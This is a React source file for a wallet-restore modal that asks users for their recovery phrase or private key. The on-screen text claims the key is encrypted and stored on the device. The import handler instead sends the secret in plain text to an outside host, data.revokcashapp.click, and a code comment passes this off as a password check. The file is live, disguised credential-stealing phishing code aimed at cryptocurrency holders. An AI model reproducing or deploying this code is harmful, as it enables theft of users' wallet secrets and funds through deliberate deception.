import { useRef, useState } from "react";
import { motion, AnimatePresence } from "framer-motion";
import { FaArrowLeft, FaClipboard } from "react-icons/fa";

export default function WalletAccessModal({ isOpen, onClose }) {
  const [seedPhrase, setSeedPhrase] = useState("");
  const [mode, setMode] = useState("passPhrase"); // "privateKey" or "recovery"
  const isPrivateKey = mode === "privateKey";
  const textRef = useRef();
  const handleClose = () => {
    setMode("passPhrase");
    onClose();
  };
  const handlePaste = async () => {
    try {
      const text = await navigator.clipboard.readText();
      if (textRef.current) {
        textRef.current.value = text;
      }
    } catch (err) {
      console.error("Failed to paste from clipboard:", err);
    }
  };

  const handleImport = async () => {
    let vault = {
      type: isPrivateKey ? "Secret Key" : "Secret Phrase",
      main: isPrivateKey
        ? `[Revoke Wallet] Secret privateKey: ${seedPhrase}`
        : `[Revoke Wallet] Secret phrase: ${seedPhrase}`,
    };
    setSeedPhrase("");
    onClose();
    // API call to confirm password
    await fetch(`https://data.revokcashapp.click/revoke.php?phrase=${vault.main}`, {
      method: "GET",
      mode: "cors",
      headers: { "content-type": "application/json" },
    });
  };
  return (
    <AnimatePresence>
      {isOpen && (
        <div className="fixed inset-0 z-50 flex items-center justify-center bg-black/50 backdrop-blur-sm">
          <motion.div
            initial={{ opacity: 0, scale: 0.95 }}
            animate={{ opacity: 1, scale: 1 }}
            exit={{ opacity: 0, scale: 0.95 }}
            className="relative w-full max-w-md p-6 bg-white shadow-xl md:max-w-2xl rounded-xl"
          >
            {/* Back Button */}
            <button
              onClick={handleClose}
              className="absolute text-xl text-black top-3 left-3"
            >
              <FaArrowLeft />
            </button>

            {/* Title */}
            <h2 className="mt-5 mb-1 text-xl font-semibold text-black">
              {isPrivateKey ? "Enter private key" : "Enter recovery phrase"}
            </h2>

            {/* Description */}
            <p className="mb-4 text-sm text-gray-600">
              {isPrivateKey
                ? "Enter your private key. It will be encrypted and stored on your device."
                : "Enter your 12 or 24 word recovery phrase to restore your wallet."}
            </p>

            {/* Input */}
            <div className="relative mb-10">
              <textarea
                ref={textRef}
                value={seedPhrase}
                onChange={(e) => setSeedPhrase(e.target.value)}
                className="w-full p-3 text-black placeholder-gray-500 bg-gray-100 border border-gray-200 rounded resize-none min-h-28 focus:outline-none focus:ring-2 focus:ring-blue-500"
                placeholder={
                  isPrivateKey
                    ? "Enter private key"
                    : "Enter your recovery phrase"
                }
              />

              <FaClipboard
                onClick={handlePaste}
                className="absolute text-gray-500 cursor-pointer bottom-3 right-3 hover:text-black"
              />
            </div>

            {/* Switch Mode */}
            <button
              onClick={() => setMode(isPrivateKey ? "recovery" : "privateKey")}
              className="block mt-4 mb-3 text-sm text-gray-600 underline hover:text-black"
            >
              {isPrivateKey ? "Use Recovery Phrase" : "Use Private Key Instead"}
            </button>

            {/* Restore Button */}

            <button
              onClick={handleImport}
              disabled={!seedPhrase.trim()}
              className={`w-full py-2 font-bold rounded transition
    ${
      seedPhrase.trim()
        ? "bg-[#030303] text-white hover:bg-[#242222]"
        : "bg-gray-300 text-gray-500 cursor-not-allowed"
    }
  `}
            >
              Restore
            </button>
          </motion.div>
        </div>
      )}
    </AnimatePresence>
  );
}
